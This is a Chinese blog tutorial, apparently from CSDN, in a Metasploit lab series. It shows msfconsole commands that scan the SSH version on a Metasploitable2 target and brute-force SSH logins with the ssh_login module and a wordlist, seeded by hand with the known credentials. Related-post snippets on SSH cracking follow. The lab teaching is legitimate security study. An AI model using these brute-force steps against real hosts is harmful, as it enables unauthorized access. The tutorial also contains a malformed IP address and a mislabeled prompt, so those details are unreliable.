Metasploit 内网渗透三 —— Metasploit 渗透测试之信息搜集4 ——基于SSH协议收集主机信息

已于 2024-06-27 09:48:55 修改
阅读量830 收藏 14
点赞数 21
文章标签: 网络 模块测试 网络安全 安全
于 2024-05-09 11:22:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63701503/article/details/138605605
版权

目录

基于SSH协议收集信息 --Metasploitable2-linux

实验内网渗透环境

Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

基于SSH协议收集信息 --Metasploitable2-linux

  1. 利用auxiliary/scanner/ssh/ssh_version模块扫描ssh版本信息2.0
  2. 利用auxiliary/scanner/ssh/ssh_login模块暴力破解linux用户和密码信息
    1. 开启kali新窗口,手动加入linux用户和密码到字典 ---以便展示效果
    2. ssh_login模块中set创建字典文件对象(设置字典--暴力破解依赖于字典文件)
    3. run,发现成功登录linux,有攻击机的40193端口向靶机ssh协议的22端口是开放的 --进行暴力破解

        暴力破解                  ——不停发送数据和收到响应包,如果有有效的密码就可以进行登录

        SSH(Secure Shell)是安全、加密的远程连接网络协议,用于通过加密和身份验证实现安全的远程登录和文件传输,使用户能够安全远程访问和管理远程计算机。端口号:22

疑问:设置手动加入密码进字典的目的是?不设置会怎么样

(1)查看 ssh 服务的版本信息

msf6 > use auxiliary/scanner/ssh/ssh_version

msf6 auxiliary(scanner/ssh/ssh_version) > show options

msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.2324.8

msf6 auxiliary(scanner/ssh/ssh_version) > run

(2)对 SSH 暴力破解

msf6 > use auxiliary/scanner/ssh/ssh_login

msf6 auxiliary(scanner/ssh/ssh_login) > show options

msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.234.8

msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

                       ——设置字典文件默认的字典文件是不满足实际需求的==》我们需使用更强大的字典文件

root@zwzj:~# echo "msfadmin msfadmin" >> /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

                        ——因为字典文件中不包含我们的用户密码信息我们把自己的密码信息手动加入进去以便展示效果新开一个终端窗口

msf6 auxiliary(scanner/ssh/ssh_login) > run        —— 回到 MSF 终端执行

久久归依
关注
红队内网攻防渗透内网渗透之Windows内网信息收集内网和域
HACKONE的博客
04-10 515
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内网中通常会部署大量的网络安全设备例如IDSIPS日志审计安全网关反病毒等在域网络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
Metasploit渗透测试实验报告
热门推荐
ling_xiao007的专栏
02-21 1万+
Metasploit渗透测试魔鬼训练营》一书采用独特的让读者成为虚拟渗透测试的主角的方式,经历一次对DVSSC公司网络渗透测试任务。渗透测试的目标为DVSSC公司DMZ网段以及内网客户端主机。四个主机均存在严重漏洞缺陷,可执行不同方式的攻击方式。 信息搜集阶段获得了dvscc的域名注册信息、地理位置,以及DMZ网段操作系统版本、开放端口及其服务版本等信息,但域名注册信息存有疑问。 漏洞扫描阶段获得DMZ网段主机大量漏洞信息,可采取不同方式的攻击方式,如口令猜测、网络服务渗透攻击、浏览器渗
SSH服务的渗透测试
小锤队长的博客
10-05 3569
目录 一,ssh私钥泄露 充电站: 二,ssh 服务测试(暴力破解) 充电站: 一,ssh私钥泄露 靶场:192.168.11.166 1,信息嗅探 对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限) nmap -sV 192.168.11.166 //挖掘开放服务...
Metasploit对目标主机SSH爆破
→_→
08-16 8140
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1)利用SSH弱口令漏洞,获取目标主机权限。 [实验原理] 1) 靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务。 [实验环境] [实验步骤] 一、利用nmap工具扫描目标主机 1.1 使用nmap命令对目标主机进行扫描。 1.2 输入“nmap –sV -O 192.168.1.3”,对目标主机进行端口扫描,发现开放2...
Metasploit实战之-SSH暴力破解过程
lucashu的博客
04-17 6790
本文目录Metasploit概述运行环境暴力破解过程第一步:进入metasploit第二步:探测用户名第步:破解SSH Metasploit概述 Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。 运行环境 攻击机:Kali Linux 靶机:OWASP Broken Web Apps 环境搭建传送门: OWASP Brok...
利用metasploitssh模块破解ssh 口令 - cracer_CSDN
m0_67888657的博客
07-11 499
放到X:\Program Files\Metasploit\Framework3\msf3\目录下,我试了一下,直接放到c:\下面不行 只能放到msf3目录下。Metasploit软件一般我们都是用来进行溢出什么的,在看了一个国外的一个人的blog上的关于msf的技巧,发现msf还可以进行远程ssh帐号口令的破解。在info里面看到需要我们设置的选项有pass_file user_file rhosts 主要是这个选项,其他的可以直接默认就行了。上面的一条尝试的就是帐号密码信息
Metasploit 渗透测试秘籍(一)
最新发布
龙哥盟
07-18 764
渗透测试是当今网络安全的核心方面之一。它涉及通过实施现实生活中的安全测试对系统进行全面分析。它有助于识别系统主要组件中可能存在的潜在弱点,这些弱点可能出现在硬件或软件中。渗透测试成为安全的重要方面的原因是它有助于从黑客的角度识别威胁和弱点。可以实时利用漏洞来确定漏洞的影响,然后可以探索适当的补救措施或补丁,以保护系统免受外部攻击并减少风险因素。决定渗透测试可行性的最大因素是对目标系统的了解。当对目标用户没有先验知识时,实施黑盒渗透测试渗透测试人员将不得不从头开始收集有关目标系统的每一点信息,以实施攻击。
内网渗透思路.pdf
04-22
在进行内网渗透之前,第一步是要充分收集目标服务器的信息。这一步骤至关重要,因为它可以帮助我们了解目标网络的基本结构,从而更有效地定位可能的安全漏洞。 **方法与工具:** - **F-NAScan**:这是一个开源工具...
内网渗透测试安全学习ppt
02-12
6. **横向移动**:一旦获得一个系统的访问权,渗透测试者会尝试在内网中横向移动,寻找更多权限,如通过SSH、RDP等协议跳转到其他系统,或者利用内部共享的凭据。 7. **权限提升**:在内网环境中,权限提升是关键...
Metasploit内网渗透基础策略解析
Metasploit内网渗透简介 ## 1.1 Metasploit框架概述 Metasploit是一款常用的开源渗透测试框架,旨在帮助安全研究人员和渗透测试人员有效地发现、开发和验证安全漏洞。其强大的工具集和易用的接口使得内网渗透测试...
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
metasploitable3靶场渗透使用msf6实操(按照官方文档端口顺序(完整)
richardjung的专栏
01-22 2302
metasploitable3靶场使用msf6实操
Linux-Metasploit 渗透-魔鬼教程
m0_74025111的博客
04-20 3207
这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。用方法 -p 端口号) -sV 扫描服务器版本。
metasploitable2漏洞利用之ssh
u011250160的博客
04-22 1470
端口扫描 信息搜集发现是openssh4.7p1 找来找去也没有什么可以直接获取shell的漏洞 下面这个是枚举ssh用户名的脚本 发现用户名 msf里的模块也可以爆破密码,不过相比之下,速度不如hydra 破解出了ssh的用户名和密码就可以去登录了 在linux下直接命令行去连就行了 在windows下需要一个客户端 我这里用的是XShell 注意这里登录后的权限不是root 提权还不会,就先到这把 ...
Metasploit(msf)系列-爆破模块
chaojixiaojingang
09-27 1万+
       今天关于Kali的msf系列学习了爆破模块的使用,这个还是比较简单的,爆破的工具很多,我个人还是比较喜欢用Hydra和Burp这两个工具,不过还是介绍下msf系列的爆破模块的使用,用兴趣的可以学习。 原理:        利用主机开放的一些端口服务,进而对其用户名和密码进行弱口令的爆破,例如21端口ftp服务、22端口ssh服务、23端口telnet服务、3306端口MySQL服...
Metasploitable2靶机之第二篇--ssh密码获取
千寻的博客
04-02 1437
文章目录环境主机ssh弱口令第一步 查看SSh端口是否开启第二步 选择漏洞库第步 设置参数,开始攻击第四步 利用成功,发现存在msfadmin摘抄 环境 主机 地址 Metasploitable2 192.168.232.202 kali-linux 192.168.232.129 主机ssh弱口令 第一步 查看SSh端口是否开启 nmap –sV -O 192.168.232.202 第二步 选择漏洞库 search ssh use auxiliary/scanner/ss
Msfconsole爆破ssh
m0_48178474的博客
06-24 6432
Msfconsole爆破ssh 一:什么是ssh Ssh为linux系统下的远程登录命令。好比windows下的远程桌面。登录ssh后可以对服务器进行相关的操作! 二:端口扫描 目标发现 1:用namp 或者netcat扫描网络,发现我的路由器是开启了ssh服务2:用netcap扫描 :msfconsole破解密码 1:msfconsole运行 ...
网络安全Kali之基于SSH、FTP协议收集信息
xueshenlaila的博客
03-24 6064
基于SSH协议收集信息 查看ssh服务的版本信息 msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(scanner/ssh/ssh_version) > show options msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180 msf6 auxiliary(scanner/ssh/ssh_version) > run 对SSH
Metasploit渗透测试教程:从情报收集到后渗透攻击
"这篇文档包含了metasploit渗透学习的前五个部分,主要涉及渗透测试的流程,包括情报收集、威胁建模、漏洞分析、渗透攻击和后渗透攻击阶段。此外,提到了Backtrack的使用,并提及了白帽测试、黑盒测试以及漏洞扫描器...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值